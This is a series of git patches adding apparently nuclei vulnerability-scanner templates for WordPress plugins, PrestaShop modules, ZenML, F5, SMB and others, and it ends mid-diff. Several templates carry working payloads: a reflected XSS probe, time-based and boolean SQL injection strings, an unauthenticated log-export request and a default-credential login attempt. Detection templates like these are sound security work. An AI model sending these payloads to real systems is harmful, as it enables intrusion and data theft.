From ee96b856555ca800bbd3abdb540cca18fce22953 Mon Sep 17 00:00:00 2001 From: Mohammad Reza Omrani Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 001/847] Added template for CVE-2024-3822 --- CVE-2024-3822.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 CVE-2024-3822.yaml diff --git a/CVE-2024-3822.yaml b/CVE-2024-3822.yaml new file mode 100644 index 0000000000..16f028eca3 --- /dev/null +++ b/CVE-2024-3822.yaml @@ -0,0 +1,27 @@ +id: CVE-2024-3822 + +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS + author: omranisecurity + severity: medium + description: | + - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3822/ + metadata: + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + max-request: 3 + tags: cve,wordpress,plugin,xss + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "")' + condition: and \ No newline at end of file From af96901d3fae7d79a2a7c2fc7cf60d166d8e1c9c Mon Sep 17 00:00:00 2001 From: Shivam Kamboj Dattana Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 002/847] Added template for cowboy-detect --- cowboy-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cowboy-detect.yaml diff --git a/cowboy-detect.yaml b/cowboy-detect.yaml new file mode 100644 index 0000000000..53a56edff0 --- /dev/null +++ b/cowboy-detect.yaml @@ -0,0 +1,25 @@ +id: cowboy-detect + +info: + name: Cowboy - Detect + author: sechunt3r + severity: info + description: Cowboy was detected. + reference: + - https://github.com/ninenines/cowboy + metadata: + verified: true + shodan-query: "cowboy" + tags: tech,cowboy,detect + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - "Server: Cowboy" + part: hea \ No newline at end of file From 697c1e00c328e642ca7cd8ca5b4c90b1d06a1a48 Mon Sep 17 00:00:00 2001 From: Drew_V Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 003/847] Added template for f5-admin-interface --- f5-admin-interface.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 f5-admin-interface.yaml diff --git a/f5-admin-interface.yaml b/f5-admin-interface.yaml new file mode 100644 index 0000000000..1118f041e0 --- /dev/null +++ b/f5-admin-interface.yaml @@ -0,0 +1,24 @@ +id: f5-admin-interface +info: + name: F5 Admin Interface Detection + description: Detects F5 admin interfaces. + author: drewvravick + severity: high + tags: [f5, admin-interface, detection] + +requests: + - method: GET + path: + - "{{BaseURL}}/tmui/login.jsp" + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + words: + - 'BIG-IP Configuration Utility' + - 'F5 Networks' + part: body + - type: status + status: + - 200 \ No newline at end of file From 0bba4427956b954e06b0fbdc8e2a902b1ed0f26f Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH 004/847] Added template for CVE-2024-1380 --- CVE-2024-1380.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 CVE-2024-1380.yaml diff --git a/CVE-2024-1380.yaml b/CVE-2024-1380.yaml new file mode 100644 index 0000000000..62848e8eb1 --- /dev/null +++ b/CVE-2024-1380.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-1380 + +info: + name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export + author: FLX + severity: medium + description: | + The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-1380 + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: wordpress,relevanssi,cve,vulnerability,cve2024 + +http: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + body: "action=&relevanssi_export=1" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' + - 'contains(header, "Content-Type: application/download")' \ No newline at end of file From abd5551262a6a560a81c3bd336609be03aaadd24 Mon Sep 17 00:00:00 2001 From: pentesttools-com Date: Wed, 20 Sep 2023 14:47:50 +0300 Subject: [PATCH 005/847] fix: template for CVE-2022-1595 This template uses two request, even though the POC linked in the reference uses only one. One request is enough, helps avoiding FNs and makes the last request be the one the user should see as a POC for this vuln. --- http/cves/2022/CVE-2022-1595.yaml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 1e6b7b30f2..974b2c452e 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -34,9 +34,6 @@ http: HEAD /wp-login.php HTTP/1.1 Host: {{Hostname}} Cookie: valid_login_slug=1 - - | - HEAD /wp-login.php HTTP/1.1 - Host: {{Hostname}} matchers-condition: and matchers: @@ -46,7 +43,3 @@ http: - "contains(header_1, 'wordpress_')" - "contains(header_1, 'Location')" condition: and - - - type: dsl - dsl: - - "status_code_2 != 302" From a6b9cacf295efa7e6a851df76798127c7c624c41 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 2 Apr 2024 13:04:44 +0530 Subject: [PATCH 006/847] Create rsync-list-modules.yaml --- .../enumeration/rsync/rsync-list-modules.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 javascript/enumeration/rsync/rsync-list-modules.yaml diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml new file mode 100644 index 0000000000..e4a8a069a4 --- /dev/null +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -0,0 +1,38 @@ +id: rsync-list-modules + +info: + name: Rsync List Modules + author: pussycat0x + severity: low + description: | + Lists modules available for rsync (remote file sync) synchronization. + reference: + - https://nmap.org/nsedoc/scripts/rsync-list-modules.html + metadata: + verified: true + shodan-query: port:873 + max-request: 1 + tags: network,rsync,enum + +javascript: + - code: | + const c = require("nuclei/net"); + let s = "@RSYNCD: 31.0\n\n" + let conn = c.Open('tcp', `${Host}:${Port}`); + conn.Send(s); + response =(conn.RecvString(1024)) + response; + + args: + Host: "{{Host}}" + Port: 873 + + matchers: + - type: word + words: + - "RSYNCD: " + + extractors: + - type: regex + regex: + - '(.*)' From 8ef7903eacb6c3a05a182e8a24777c93c162cf35 Mon Sep 17 00:00:00 2001 From: Lucky-Pulse Date: Mon, 8 Apr 2024 12:10:06 +1200 Subject: [PATCH 007/847] This is a new template to hunt for webpack source maps. --- headless/webpack-sourcemap-hunter | 213 ++++++++++++++++++++++++++++++ 1 file changed, 213 insertions(+) create mode 100644 headless/webpack-sourcemap-hunter diff --git a/headless/webpack-sourcemap-hunter b/headless/webpack-sourcemap-hunter new file mode 100644 index 0000000000..3ef43a2acd --- /dev/null +++ b/headless/webpack-sourcemap-hunter @@ -0,0 +1,213 @@ +id: Webpack-Sourcemap +info: + name: Webpack-Sourcemap + author: lucky0x0d, PulseSecurity.co.nz + reference: + - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage + severity: low + tags: javascript,webpack,sourcemaps + classification: + cwe-id: CWE-200 + description: parses target to find scripts and then checks for a sourcemapconsumer, inline sourcemaps, if js files have map files, if sourcemap headers exists + metadata: + max-request: 1 + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: sleep + args: + duration: 10 + - action: script + name: extract + args: + code: | + () => { + AAA = []; + window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); + BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] + CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] + return [...new Set([...AAA, ...BBB, ...CCC])]; + } + + extractors: + - type: regex + name: allscripts + internal: true + part: extract + regex: + - (?i)http(.[~a-zA-Z0-9.\/\-_:]+) + +flow: | + headless(); + http("check_base_srcmap_inline"); + for (let scripturi of iterate(template["allscripts"])) { + set ("scripturi", scripturi); + http("check_for_srcmap_header"); + http("check_for_srcmap_inline"); + http("check_for_srcmap_url"); + for (let mapuri of iterate(template["allmaps"])) { + set ("mapuri", mapuri); + http("fetch_absolute_srcmap"); + http("fetch_relative_srcmap"); + http("fetch_root_relative_srcmap"); + http("fetch_noscheme_srcmaps"); + }; + set ("allmaps", null); + }; + +http: + - method: GET + id: check_base_srcmap_inline + disable-cookie: true + redirects: true + path: + - '{{BaseURL}}' + + matchers: + - type: regex + name: Inline_SourceMap + regex: + - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo' + + - type: regex + name: SourceMapConsumer_Present + regex: + - '(?i)SourceMapConsumer' + + - method: GET + id: check_for_srcmap_url + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + extractors: + - type: regex + name: allmaps + internal: true + group: 1 + regex: + - (?i)\/\/#\ssourceMappingURL=(.[~a-zA-Z0-9.\/\-_:]+) + + - method: GET + id: check_for_srcmap_inline + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + matchers: + - type: regex + name: Inline_SourceMap + regex: + - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo' + + - type: regex + name: SourceMapConsumer_Present + regex: + - '(?i)SourceMapConsumer' + + - method: GET + id: check_for_srcmap_header + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + matchers: + - type: dsl + name: Source_Map_Header + dsl: + - "regex('(?i)SourceMap', header)" + - "status_code != 301 && status_code != 302" + condition: and + + extractors: + - type: kval + kval: + - X_SourceMap + - SourceMap + + - method: GET + id: fetch_absolute_srcmap + disable-cookie: true + redirects: true + path: + - '{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 + + - method: GET + id: fetch_relative_srcmap + disable-cookie: true + redirects: true + path: + - '{{replace_regex(scripturi,"([^/]+$)","")}}{{replace_regex(mapuri,"(^\/+)","")}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 + + - method: GET + id: fetch_root_relative_srcmap + disable-cookie: true + redirects: true + path: + - '{{replace_regex(scripturi,replace_regex(scripturi,"http.+//[^/]+",""),"")}}{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 + + - method: GET + id: fetch_noscheme_srcmaps + disable-cookie: true + redirects: true + path: + - '{{Scheme}}{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 From b620a56101f50534eecd6685c614e109e84a88a8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Apr 2024 13:01:44 +0530 Subject: [PATCH 008/847] Create CVE-2024-25723.yaml --- passive/cves/2024/CVE-2024-25723.yaml | 43 +++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 passive/cves/2024/CVE-2024-25723.yaml diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml new file mode 100644 index 0000000000..99d86c16ce --- /dev/null +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-25723 + +info: + name: ZenML ZenML Server - Improper Authentication + author: David Botelho Mariano + severity: critical + description: ZenML Server in the ZenML machine learning package before 0.46.7 + for Python allows remote privilege escalation because the + /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on + the basis of a valid username along with a new password in the request body. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Implement proper authentication mechanisms and ensure access controls are correctly configured. + reference: + - https://www.zenml.io/blog/critical-security-update-for-zenml-users + - https://github.com/zenml-io/zenml + classification: + epss-score: 0.00045 + epss-percentile: 0.13559 + tags: cve,cve2024,passive,auth-bypass,zenml + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/info" + + matchers: + - type: dsl + dsl: + - "compare_versions(version, '< 0.46.7')" + - "!contains_any(version, '0.44.4', '0.43.1', '0.42.2')" + - "contains_all(body, 'deployment_type', 'database_type')" + condition: and + + extractors: + - type: regex + part: body + group: 1 + name: version + regex: + - '"version":"(.*?)"' + internal: true From 3de60f724af430a52a696bf309131f1143170e09 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Apr 2024 13:05:02 +0530 Subject: [PATCH 009/847] format-update --- passive/cves/2024/CVE-2024-25723.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 99d86c16ce..16b1b7edf6 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -4,10 +4,8 @@ info: name: ZenML ZenML Server - Improper Authentication author: David Botelho Mariano severity: critical - description: ZenML Server in the ZenML machine learning package before 0.46.7 - for Python allows remote privilege escalation because the - /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on - the basis of a valid username along with a new password in the request body. + description: + ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. impact: | Successful exploitation could lead to unauthorized access to sensitive data. remediation: | @@ -15,6 +13,9 @@ info: reference: - https://www.zenml.io/blog/critical-security-update-for-zenml-users - https://github.com/zenml-io/zenml + - https://github.com/zenml-io/zenml/compare/0.42.1...0.42.2 + - https://github.com/zenml-io/zenml/compare/0.43.0...0.43.1 + - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 classification: epss-score: 0.00045 epss-percentile: 0.13559 From 1bd2160803ec9ba5e0d5c8832a6f4c961f8d11d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Apr 2024 13:08:38 +0530 Subject: [PATCH 010/847] Update CVE-2024-25723.yaml --- passive/cves/2024/CVE-2024-25723.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 16b1b7edf6..611ffe34ae 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -4,7 +4,7 @@ info: name: ZenML ZenML Server - Improper Authentication author: David Botelho Mariano severity: critical - description: + description: | ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. impact: | Successful exploitation could lead to unauthorized access to sensitive data. From 45d76297e3d79185ff64d64ebcc69eaa98ac12e1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Apr 2024 13:11:08 +0530 Subject: [PATCH 011/847] added metadata --- passive/cves/2024/CVE-2024-25723.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 611ffe34ae..3d34c505da 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -19,6 +19,11 @@ info: classification: epss-score: 0.00045 epss-percentile: 0.13559 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-2028554187 + fofa-query: body="ZenML" tags: cve,cve2024,passive,auth-bypass,zenml http: From 12873950d26fa56299f7d9305a513201f2ae2c90 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 11 Apr 2024 08:42:47 +0530 Subject: [PATCH 012/847] Create ampjuke-default-login.yaml --- .../default-logins/ampjuke-default-login.yaml | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 http/default-logins/ampjuke-default-login.yaml diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml new file mode 100644 index 0000000000..125086f0a2 --- /dev/null +++ b/http/default-logins/ampjuke-default-login.yaml @@ -0,0 +1,61 @@ +id: ampjuke-default-login + +info: + name: AmpJuke - Default Login + author: ritikchaddha + severity: high + description: | + AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. + metadata: + max-request: 2 + shodan-query: http.favicon.hash:-121681558 + tags: default-login,ampjuke + +http: + - raw: + - | + GET /login.php HTTP/2 + Host: {{Hostname}} + + - | + POST /loginvalidate.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + uuid={{url_encode(token)}}&login={{username}}&password={{password}}&Submit=Submit + + - | + GET /index.php?what=welcome HTTP/2 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - admin + password: + - pass + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - 'AmpJuke' + - 'Track' + - 'Logout' + - 'Random play' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_1 + name: token + group: 1 + regex: + - 'name="uuid" value="([./a-z0-9-]+)">' + internal: true From cfe66dcad9d8e0308822d2cc7c0f5e6739590032 Mon Sep 17 00:00:00 2001 From: Puben Date: Thu, 11 Apr 2024 16:01:56 +0200 Subject: [PATCH 013/847] Change request for template network/detection/smb-detect.yaml to match both linux-based (Samba) smb servers and windows servers --- network/detection/smb-detect.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index 7aa8736bb6..0bd564b532 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -8,7 +8,7 @@ info: SMB (Server Message Block) is a network-layered protocol mainly used on Windows for sharing files, printers, and communication between network-attached computers. SMB related vulnerabilities can be levaraged to compromise large-scale systems. metadata: max-request: 1 - tags: network,windows,smb,service,detect + tags: network,windows,linux,smb,service,detect tcp: - inputs: @@ -25,4 +25,3 @@ tcp: - "SMBr" - "NT LM" condition: and -# digest: 490a00463044022045d1bbb8f1640bc13ccc108187f76a13884be166a254865218059d30b900523602205a53dcdc0271170b73443138c4adb5e299726b6fb7bfb7bd394140c1947ff136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e9ca472a552e51e55fdb5906d205c22c919b4f99 Mon Sep 17 00:00:00 2001 From: Puben Date: Thu, 11 Apr 2024 16:22:36 +0200 Subject: [PATCH 014/847] Change request for template network/detection/smb-detect.yaml to match both linux-based (Samba) smb servers and windows servers --- network/detection/smb-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index 0bd564b532..cf3c61f95e 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -24,4 +24,4 @@ tcp: words: - "SMBr" - "NT LM" - condition: and + condition: or From 124086fe323035a56e0ff8da07e7a0a7f63c3fb1 Mon Sep 17 00:00:00 2001 From: theMiddleBlue Date: Mon, 6 May 2024 20:04:28 +0200 Subject: [PATCH 015/847] feat: new directory listing template --- http/miscellaneous/directory-listing.yaml | 90 +++++++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 http/miscellaneous/directory-listing.yaml diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml new file mode 100644 index 0000000000..f133186781 --- /dev/null +++ b/http/miscellaneous/directory-listing.yaml @@ -0,0 +1,90 @@ +id: directory-listing + +info: + name: Directory Listing Enabled + author: theMiddle + severity: low + description: Directory Indexing is a web server feature that allows the contents of a directory to be displayed when no index file is present. This can be a security risk as it can expose sensitive files, old backup or unreferenced files. + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/04-Review_Old_Backup_and_Unreferenced_Files_for_Sensitive_Information + - https://portswigger.net/kb/issues/00600100_directory-listing + tags: miscellaneous,misc,generic,misconfguration,web + +flow: | + function target_is_in_scope(url) { + if (url.startsWith(template.http_1_host) || url.startsWith("/")) { + return true; + } + return false; + } + + http(1); + + if(template.links) { + var path_checked = []; + var paths = []; + + for(i=0; iIndex of" + part: body From dd5224cb5f572262f9a075e001dba586fd21fd35 Mon Sep 17 00:00:00 2001 From: theMiddleBlue Date: Mon, 6 May 2024 20:28:36 +0200 Subject: [PATCH 016/847] fix: trailing spaces --- http/miscellaneous/directory-listing.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/miscellaneous/directory-listing.yaml b/http/miscellaneous/directory-listing.yaml index f133186781..b183a7f32e 100644 --- a/http/miscellaneous/directory-listing.yaml +++ b/http/miscellaneous/directory-listing.yaml @@ -23,14 +23,14 @@ flow: | if(template.links) { var path_checked = []; var paths = []; - + for(i=0; i Date: Wed, 8 May 2024 14:45:01 +0300 Subject: [PATCH 017/847] add cve-2022-1580 --- http/cves/2022/CVE-2022-1580.yaml | 52 +++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/cves/2022/CVE-2022-1580.yaml diff --git a/http/cves/2022/CVE-2022-1580.yaml b/http/cves/2022/CVE-2022-1580.yaml new file mode 100644 index 0000000000..6fd7cfb485 --- /dev/null +++ b/http/cves/2022/CVE-2022-1580.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-1580 + +info: + name: Site Offline WP Plugin < 1.5.3 - Access Bypass + author: Kazgangap + severity: medium + description: | + The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-1580 + - https://wpscan.com/vulnerability/7b6f91cd-5a00-49ca-93ff-db7220d2630a/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2022-1580 + cwe-id: CWE-639 + epss-score: 0.00058 + epss-percentile: 0.23919 + cpe: cpe:2.3:a:freehtmldesigns:site_offline:*:*:*:*:*:wordpress:*:* + metadata: + vendor: freehtmldesigns + product: site_offline + framework: wordpress + tags: wpscan,cve2022,bypass,wordpress,wordpress-plugin + +flow: http(1) && http(2) + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/site-offline/readme.txt" + + matchers: + - type: word + internal: true + words: + - 'Site Offline Or Coming Soon Or Maintenance Mode ' #Plugin Check + + - method: GET + path: + - "{{BaseURL}}/?admin" + + matchers-condition: and + matchers: + - type: word + words: + - "wp-block" + - "author" + condition: or + - type: status + status: + - 200 \ No newline at end of file From b9a882b38996e89ee70e5ff27b7f1c1d983b2639 Mon Sep 17 00:00:00 2001 From: mastercho Date: Fri, 10 May 2024 12:30:27 +0300 Subject: [PATCH 018/847] Added/Update Blind SQL --- http/cves/2022/CVE-2022-22897.yaml | 37 ++++++++++++++++++++++++------ http/cves/2023/CVE-2023-46347.yaml | 8 +++++++ 2 files changed, 38 insertions(+), 7 deletions(-) diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 4cbf8a2d1f..2b4c3ad515 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -14,8 +14,6 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-22897 - https://packetstormsecurity.com/files/cve/CVE-2022-22897 - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html - - https://github.com/ARPSyndicate/cvemon - - https://github.com/karimhabush/cyberowl classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -35,6 +33,9 @@ info: http: - raw: + - | + GET /modules/appagebuilder/config.xml HTTP/1.1 + Host: {{Hostname}} - | POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} @@ -44,21 +45,43 @@ http: leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0) - | - GET /modules/appagebuilder/config.xml HTTP/1.1 + POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}} + X-Requested-With: XMLHttpRequest + leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6644=6644-- yMwI + - | + POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}} + X-Requested-With: XMLHttpRequest + + leoajax=1&product_one_img=-{{rand_int(0000, 9999)}}) OR 6643=6644-- yMwI extractors: - type: regex name: version - part: body_2 + part: body_1 internal: true group: 1 regex: - "\\s*\\s*<\\/version>" matchers: - type: dsl + name: time-based dsl: - - 'duration_1>=6' - - 'status_code_2 == 200 && compare_versions(version, "<= 2.4.4")' + - 'duration_2>=6' + - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' condition: and -# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + + + - type: dsl + name: blind-based + dsl: + - 'status_code_1 == 200 && compare_versions(version, "<= 2.4.4")' + - 'contains(body_3, "content") && contains(body_3, "{{Hostname}}")' + - '!contains(body_4, "content") && !contains(body_4, "{{Hostname}}")' + - 'len(body_3) > 200 && len(body_4) <= 22' + condition: and \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index e9306d239e..9c6e143c49 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -22,6 +22,14 @@ http: Content-Type: application/x-www-form-urlencoded search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;-- + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + + host-redirects: true + matchers-condition: and matchers: - type: dsl From af2f5ade8432064c70c00f982af826c44fa6a36e Mon Sep 17 00:00:00 2001 From: mastercho Date: Fri, 10 May 2024 13:39:32 +0300 Subject: [PATCH 019/847] reverting to last stage --- http/cves/2023/CVE-2023-46347.yaml | 35 +++++++++++++++++------------- 1 file changed, 20 insertions(+), 15 deletions(-) diff --git a/http/cves/2023/CVE-2023-46347.yaml b/http/cves/2023/CVE-2023-46347.yaml index 9c6e143c49..7a9a3cacbe 100644 --- a/http/cves/2023/CVE-2023-46347.yaml +++ b/http/cves/2023/CVE-2023-46347.yaml @@ -1,40 +1,45 @@ id: CVE-2023-46347 + info: - name: CVE-2023-46347 + name: PrestaShop Step by Step products Pack - SQL Injection author: MaStErChO - severity: high + severity: critical description: | In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions. reference: - https://security.friendsofpresta.org/modules/2023/10/24/ndk_steppingpack.html - https://stack.chaitin.com/poc/detail/3977 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-46347 + cwe-id: CWE-89 + epss-score: 0.00076 + epss-percentile: 0.31923 + cpe: cpe:2.3:a:ndkdesign:ndk_steppingpack:*:*:*:*:*:prestashop:*:* metadata: + verified: true max-request: 1 + vendor: ndkdesign + product: ndk_steppingpack framework: prestashop shodan-query: http.component:"prestashop" - tags: sqli,prestashop,ndk_steppingpack + tags: cve,cve2023,sqli,prestashop,ndk_steppingpack http: - raw: - | + @timeout: 10s POST /modules/ndk_steppingpack/search-result.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded search_query=1%22%29;select+0x73656c65637420736c6565702836293b+into+@a;prepare+b+from+@a;execute+b;-- - - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - - matchers-condition: and matchers: - type: 